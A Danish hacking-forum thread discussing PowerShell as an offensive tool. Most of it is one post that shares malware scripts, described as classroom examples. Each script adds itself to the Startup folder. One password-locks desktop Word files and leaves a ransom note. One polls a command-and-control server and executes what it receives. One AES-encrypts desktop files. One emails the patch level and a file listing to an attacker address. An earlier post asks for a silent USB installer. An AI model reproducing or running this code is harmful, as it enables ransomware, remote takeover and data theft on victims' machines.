Denne side bruger cookies
Dette forum bruger cookies. Hvis du er registreret, bruges de til at huske hvem du er logget ind som. Hvis ikke, gemmer vi dit sidste besøgstidspunkt. Besøgstidspunktet bruges bl.a. til at holde øje med, hvilke tråde du allerede har læst. Cookies er små tekstdokumenter, som bliver gemt i din browser og udgør ingen sikkerhedsrisiko. Tryk "Mere Information" nedenfor, for en liste over de cookies vi sætter. Du har mulighed for at fravælge cookies ved at klikke på knappen "Blokér Cookies" i bunden af denne boks.

En ikke-personhenførbar cookie vil blive gemt i din browser, uanset dit valg (Medmindre du ikke foretager et). Således undgår du at blive spurgt igen. Du kan til enhver tid ændre dit valg via linket i bunden af siden.

Tråd bedømmelse:
  • 0 Stemmer - 0 Gennemsnit
  • 1
  • 2
  • 3
  • 4
  • 5
Powershell
05-04-2018, 10:23 (Denne besked var sidst ændret: 05-04-2018, 10:25 af Spagnum.)
#1
Powershell
[Billede: 5xmGxIA.png]

Ville sådan set bare starte en diskussion om Powershell som "offensiv værktøj"
Hvor mange af jer bruger powershell som værktøj i hacking relaterede opgaver?

Selv bruger jeg primært i hverdagen til Adminstration og automatisering af diverse opgaver.

Lidt inspiration hvad powershell b.la. kan bruges til:
https://github.com/Hack-with-Github/Windows
Don't learn to hack, hack to learn
Find alle beskeder fra denne bruger
Citer denne besked i et svar
05-04-2018, 17:11
#2
RE: Powershell
Powershell er sindssyg vigtig for hackere, da det gør det nemt at download + execute med fx DuckyScript.

Bruger det ikke selv, da jeg er mere til Ubuntu on Windows eller hvad det nu hedder.
yolo
Find alle beskeder fra denne bruger
Citer denne besked i et svar
18-11-2018, 20:32
#3
RE: Powershell
Jeg er frisk på PowerShell

Jeg skal have lavet et eller andet script, som 'silent' installerer noget fra en USB-nøgle.

Opium
Find alle beskeder fra denne bruger
Citer denne besked i et svar
20-11-2018, 09:20
#4
RE: Powershell
Jeg bruger powershell til at løse småopgaver i det daglige på windows. Ligesom alm shellscript på linux.
Jeg har haft lavet nogle super primitive "malware" eksempler, for at vise studerende hvor simpelt det er at skabe noget farligt. Jeg kopierer det ind her under. Men altså, der er ikke noget vildt i det, det er helt basic, og sikkert noget værre slamkode hvis man er en haj til powershell.


Eksempel der krypterer wordfiler på skrivebordet, via words egen krypteringsfunktion:

Citer:$startup = [environment]::getfolderpath("Startup")
Copy-Item $MyInvocation.MyCommand $startup

$passwd="MINHEMLIGKODE"
$read_path = "[System.Environment]::GetFolderPath([System.Environment+SpecialFolder]::Desktop)"
$write_path = "[System.Environment]::GetFolderPath([System.Environment+SpecialFolder]::Desktop)"
$WordObj = New-Object -ComObject Word.Application
foreach ($file in Get-ChildItem $read_path -Filter *.docx)
{
   $WordObj.Visible = $false
   $WordDoc = $WordObj.Documents.Open($file.FullName, $null, $false, $null, $passwd, $passwd)
   $WordDoc.Activate()
   $WordDoc.Password=$passwd
   $WordDoc.SaveAs($write_path+$file.name,24)
   $WordDoc.Close()
}
$WordObj.Application.Quit()

New-Item -Path '[System.Environment]::GetFolderPath([System.Environment+SpecialFolder]::Desktop)\DINEDATAERKRYPTEREDE.txt' -ItemType File
Add-Content '[System.Environment]::GetFolderPath([System.Environment+SpecialFolder]::Desktop)\DINEDATAERKRYPTEREDE.txt' "Vigtig information: Dine Worddokumenter på Skrivebordet er nu krypterede, øv bøv."


Simpelt script der ligger og henter kommandoer på en C&C-server og kører dem

Citer:$startup = [environment]::getfolderpath("Startup")
Copy-Item $MyInvocation.MyCommand $startup

    Write-Host "Jeg henter lige en kommando fra en ond server paa interwebs,"
    Write-Host " og eksekverer kommandoen,"
    Write-Host " og venter i et par sekunder,"
    Write-Host " og goer det samme igen..."

while(1)
{
    $result = Invoke-WebRequest -Uri "https://myevilserver.ru/command"
    Invoke-Expression $result  
    Start-Sleep 5
}


Andet simpelt eksempel på at kryptere filer på skrivebordet, via windows' indbyggede cryptoservice

Citer:$startup = [environment]::getfolderpath("Startup")
Copy-Item $MyInvocation.MyCommand $startup

Get-ChildItem "[System.Environment]::GetFolderPath([System.Environment+SpecialFolder]::Desktop)" -Filter * | 
Foreach-Object {
    $originalFile = $_.FullName
    $aes = New-Object System.Security.Cryptography.AesCryptoServiceProvider
    $inputStream = New-Object System.IO.FileStream($originalFile, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read)
    $outputStream = New-Object System.IO.FileStream("$originalFile+.encrypted", [System.IO.FileMode]::Create, [System.IO.FileAccess]::Write)
    $cryptoStream = New-Object System.Security.Cryptography.CryptoStream($outputStream, $aes.CreateEncryptor(), [System.Security.Cryptography.CryptoStreamMode]::Write)
    $buffer = New-Object byte[](256)
    while (($read = $inputStream.Read($buffer, 0, $buffer.Length)) -gt 0)
        {
            $cryptoStream.Write($buffer, 0, $read)
        }
    $_.attributes = "Hidden"

    }


Her er et eksempel på at sende emails ud, f.eks. en liste over patchlevel på maskinen, og en liste over filer på desktop:

Citer:$startup = [environment]::getfolderpath("Startup")
Copy-Item $MyInvocation.MyCommand $startup

$Outlook = New-Object -ComObject Outlook.Application 
$Mail = $Outlook.CreateItem(0) 
$Mail.To = "minhackermail@mail.ru" 
$Mail.Subject = "Her er liste over patchlevel:" 
$Mail.Body = Get-Hotfix
$Mail.Send() 
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Outlook) | Out-Null

$Outlook = New-Object -ComObject Outlook.Application 
$Mail = $Outlook.CreateItem(0) 
$Mail.To = "minhackermail@mail.ru" 
$Mail.Subject = "Her er liste over filer paa desktop:" 
$Mail.Body = Get-ChildItem -Path [System.Environment]::GetFolderPath([System.Environment+SpecialFolder]::Desktop) -Force -Recurse
$Mail.Send() 
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Outlook) | Out-Null
Find alle beskeder fra denne bruger
Citer denne besked i et svar
« Ældre | Nyere »




User(s) browsing this thread: 1 Gæst(er)